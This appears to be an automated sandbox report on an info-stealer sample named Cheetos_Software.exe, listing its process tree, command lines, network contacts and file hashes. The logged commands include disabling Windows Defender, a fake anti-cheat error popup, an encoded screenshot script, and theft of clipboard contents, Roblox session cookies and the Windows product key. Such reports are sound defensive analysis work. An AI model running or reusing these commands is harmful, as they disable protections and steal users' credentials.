PID 2000 wrote to memory of 3508 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 2000 wrote to memory of 3648 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 2000 wrote to memory of 3648 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3508 wrote to memory of 1100 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 3508 wrote to memory of 1100 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 3648 wrote to memory of 1248 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 3648 wrote to memory of 1248 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2000 wrote to memory of 3492 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 2000 wrote to memory of 3492 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe

"C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe"

C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe

"C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('External software found (Error code 0x100000675)', 0, 'Easy Anti Cheat', 0+16);close()""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\    ‎.scr'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\    ‎.scr'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\mshta.exe

mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('External software found (Error code 0x100000675)', 0, 'Easy Anti Cheat', 0+16);close()"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\attrib.exe

attrib -r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\attrib.exe

attrib +r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pkckntpt\pkckntpt.cmdline"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES43A0.tmp" "c:\Users\Admin\AppData\Local\Temp\pkckntpt\CSCEE286FF59FEA47D09589A43890A1D67D.TMP"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\getmac.exe

getmac

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI34842\rar.exe a -r -hp"Zachattack091010!" "C:\Users\Admin\AppData\Local\Temp\TpyFv.zip" *"

C:\Users\Admin\AppData\Local\Temp\_MEI34842\rar.exe

C:\Users\Admin\AppData\Local\Temp\_MEI34842\rar.exe a -r -hp"Zachattack091010!" "C:\Users\Admin\AppData\Local\Temp\TpyFv.zip" *

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /7

Network

Country Destination Domain Proto
US 8.8.8.8:53 gstatic.com udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
DE 142.250.186.99:443 gstatic.com tcp
US 8.8.8.8:53 99.186.250.142.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discordapp.com udp
US 162.159.135.233:443 discordapp.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 233.135.159.162.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 130.118.77.104.in-addr.arpa udp
US 8.8.8.8:53 84.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 udp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI34842\python311.dll

MD5 76eb1ad615ba6600ce747bf1acde6679
SHA1 d3e1318077217372653be3947635b93df68156a4
SHA256 30be871735591ad96bc3fc7e541cdef474366159c2f7443feb30739cbd2db7e1
SHA512 2b960e74dd73f61d6a44fef0de9f2d50bcf2ec856b7aa5b97f0107e3cdadea461790760668a67db2ecaf71ff323133ee39ce2b38aafff3629c14e736d6a64aeb

C:\Users\Admin\AppData\Local\Temp\_MEI34842\VCRUNTIME140.dll

MD5 be8dbe2dc77ebe7f88f910c61aec691a
SHA1 a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

memory/2000-25-0x00007FFD30D50000-0x00007FFD3133E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI34842\base_library.zip

MD5 81cd6d012885629791a9e3d9320c444e
SHA1 53268184fdbddf8909c349ed3c6701abe8884c31
SHA256 a18892e4f2f2ec0dee5714429f73a5add4e355d10a7ba51593afc730f77c51dd
SHA512 d5bf47fad8b1f5c7dcaa6bef5d4553e461f46e6c334b33d8adc93689cf89365c318f03e961a5d33994730b72dc8bde62209baca015d0d2d08a081d82df7dfd73

C:\Users\Admin\AppData\Local\Temp\_MEI34842\_ctypes.pyd

MD5 ee2d4cd284d6bad4f207195bf5de727f
SHA1 781344a403bbffa0afb080942cd9459d9b05a348
SHA256 2b5fe7c399441ac2125f50106bc92a2d8f5e2668886c6de79452b82595fc4009
SHA512 a6b3ad33f1900132b2b8ff5b638cbe7725666761fc90d7f76fc835ecd31dfefc48d781b12b1e60779191888931bb167330492599c5fea8afa51e9c0f3d6e8e55

memory/2000-30-0x00007FFD43B50000-0x00007FFD43B74000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI34842\_ssl.pyd

MD5 936919f3509b2a913bf9e05723bc7cd2
SHA1 6bf9f1ecfcd71fc1634b2b70fcd567d220b1a6bd
SHA256 efce6dcf57915f23f10c75f6deaf6cb68efe87426caad4747ca908199b1f01e3
SHA512 2b2436e612b6cd60d794f843498fcbf8624a80e932d242592e569e32ec1d40a25d80e2c7e9f8edc7fc0478cef2ec6f77ad6c6ebbddf5afb027263397c91c73c3

C:\Users\Admin\AppData\Local\Temp\_MEI34842\_sqlite3.pyd

MD5 c9d6ffa3798bb5ae9f1b082d66901350
SHA1 25724fecf4369447e77283ece810def499318086
SHA256 410dad8d8b4ccf6f22701a2cdcb1bb5fd10d8efa97a21b1f5c7e1b8afc9f4fec
SHA512 878b10771303cb885039348fc7549338ad2ce609f4df6fff6588b079ab9efb624d6bc31474e806ad2a97785b30877b8241286276f36aab9e50a92cbf11adc448

C:\Users\Admin\AppData\Local\Temp\_MEI34842\_socket.pyd

MD5 3ea95c5c76ea27ca44b7a55f6cfdcf53
SHA1 aace156795cfb6f418b6a68a254bb4adfc2afc56
SHA256 7367f5046980d3a76a6ddefc866b203cbaced9bb17f40ea834aed60bb5b65923
SHA512 916effbe6130a7b6298e1bd62e1e83e9d3defc6a7454b9044d953761b38808140a764ded97dcb1ab9d0fa7f05ae08c707da7af1c15f672a959ad84aa8da114c0

memory/2000-48-0x00007FFD49860000-0x00007FFD4986F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI34842\_queue.pyd

MD5 8b3ba5fb207d27eb3632486b936396a3
SHA1 5ad45b469041d88ec7fd277d84b1e2093ec7f93e
SHA256 9a1e7aaf48e313e55fc4817f1e7f0bfe0a985f30c024dcc8d28d67f8ff87a051
SHA512 18f5a0b1a384e328d07e59a5cefbc25e027adf24f336f5ec923e38064312ea259851167bc6bc0779e2d05cd39ddd8d16a2dfd15751c83ee58fda3b1187edc54b

C:\Users\Admin\AppData\Local\Temp\_MEI34842\_lzma.pyd

MD5 5eee7d45b8d89c291965a153d86592ee
SHA1 93562dcdb10bd93433c7275d991681b299f45660
SHA256 7b5c5221d9db2e275671432f22e4dfca8fe8a07f6374fcfed15d9a3b2fdf07d9
SHA512 0d8f178ff5ef1e87aa4aae41089d063985c11544f85057e3860bcab1235f5ddb1cb582550a482c8b7eb961211fa67777e30b678294258ada27c423070ce8453e

C:\Users\Admin\AppData\Local\Temp\_MEI34842\_hashlib.pyd

MD5 6d2132108825afd85763fc3b8f612b11
SHA1 af64b9b28b505e4eab1b8dd36f0ecf5511cc78a0
SHA256 aba69b3e817bfb164ffc7549c24b68addb1c9b88a970cf87bec99d856049ee52
SHA512 196bcf97034f1767a521d60423cca9d46a6447156f12f3eac5d1060a7fa26ac120c74c3ef1513e8750090d37531d014a48dd17db27fbfbb9c4768aa3aca6d5c0

C:\Users\Admin\AppData\Local\Temp\_MEI34842\_decimal.pyd

MD5 918e513c376a52a1046c4d4aee87042d
SHA1 d54edc813f56c17700252f487ef978bde1e7f7e1
SHA256 f9570f5d214d13446ed47811c7674e1d77c955c60b9fc7247ebcb64a32ae6b29
SHA512 ac2990a644920f07e36e4cb7af81aab82a503e579ce02d5026931631388e2091a52c12e4417e8c747f2af9aa9526b441a3f842387b5be534633c2258beeed497

